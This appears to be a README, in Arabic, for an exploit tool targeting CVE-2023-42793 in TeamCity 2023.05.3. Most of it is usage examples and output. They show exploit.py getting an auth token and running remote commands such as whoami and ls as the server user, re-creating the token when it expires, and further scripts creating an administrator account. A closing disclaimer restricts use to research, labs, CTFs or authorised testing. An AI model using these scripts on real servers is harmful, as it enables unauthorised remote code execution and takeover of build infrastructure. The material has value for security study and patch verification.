
TeamCity 2023.05.3 - CVE-2023-42793 - إنشاء اسم مستخدم المسؤول
مثال على تنفيذ الأوامر:
python3 exploit.py -u http://localhost
User add token -> eyJ0eXAiOiAiVENWMiJ9.YkZ0V2tzR3NvWXhZelRfZTN0cFF1SkZjVWVz.N2M0Njk2ZTgtNWZhYi00MTU5LWJmZjQtYWU1MDFlYzZiMGY1
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser
StdErr:
Exit code: 0
Time: 16ms
Command -> ls -la /home
StdOut:total 8
drwxr-xr-x 2 root root 4096 Apr 15 2020 .
drwxr-xr-x 1 root root 4096 Feb 28 2024 ..
StdErr:
Exit code: 0
Time: 23ms
في حال انتهاء صلاحية التوكن، سيتم إنشاء توكن جديد تلقائياً.
Command -> whoami
[-] Token expired, restarting...
[!]Error deleting user
User add token -> eyJ0eXAiOiAiVENWMiJ9.ZVJiSTB6SGZWSEpldzhEa1o4cUdsWFlQRTJJ.NGQxOTg4ZWItNTJmYS00OWM3LWIwYmItZjcyODNkYjg5NTJj
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser
StdErr:
Exit code: 0
Time: 24ms
إنشاء اسم مستخدم مسؤول:
python3 user_add_administrator.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token -> eyJ0eXAiOiAiVENWMiJ9.Z21xU3ZtTXNYUXE2WGdkaWJCOFV4QWsxN2s0.NmMyZDE0YTItMDQ1OS00NGQ2LTk2YWEtNjg1MTU3ZGNiNjM0
Create username administrator
في حال وجود مستخدم موجود مسبقاً:
python3 user_add.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token -> eyJ0eXAiOiAiVENWMiJ9.Q3ZFa0ExR2tBcGlSMUZ3ZWNyMUtNN0VPQmFN.Mzk0M2EyZjAtMzVhNi00YTU0LWFmNTctMTg4MThkZmU5MDA3
is already in use by some other user.
هذا المستودع مخصص لأغراض تعليمية وبحثية في مجال أمن الحوسبة فقط. استخدام النصوص البرمجية والتقنيات الموصوفة هنا لاختراق الأنظمة دون إذن يعتبر غير قانوني وينتهك القوانين الوطنية والدولية، مثل القانون 26.388 (الأرجنتين)، وقانون الاحتيال وإساءة استخدام الحاسوب (الولايات المتحدة)، واتفاقية بودابست.
المؤلف غير مسؤول عن سوء استخدام المعلومات المقدمة هنا. يُسمح باستخدام هذه المواد فقط في بيئات خاضعة للرقابة، أو مختبرات، أو مسابقات CTF، أو بإذن صريح من مالك النظام.
إذا كنت ستجري اختبارات، فتأكد من حصولك على إذن. القرصنة دون إذن ليست اختراقاً أخلاقياً؛ بل هي جريمة.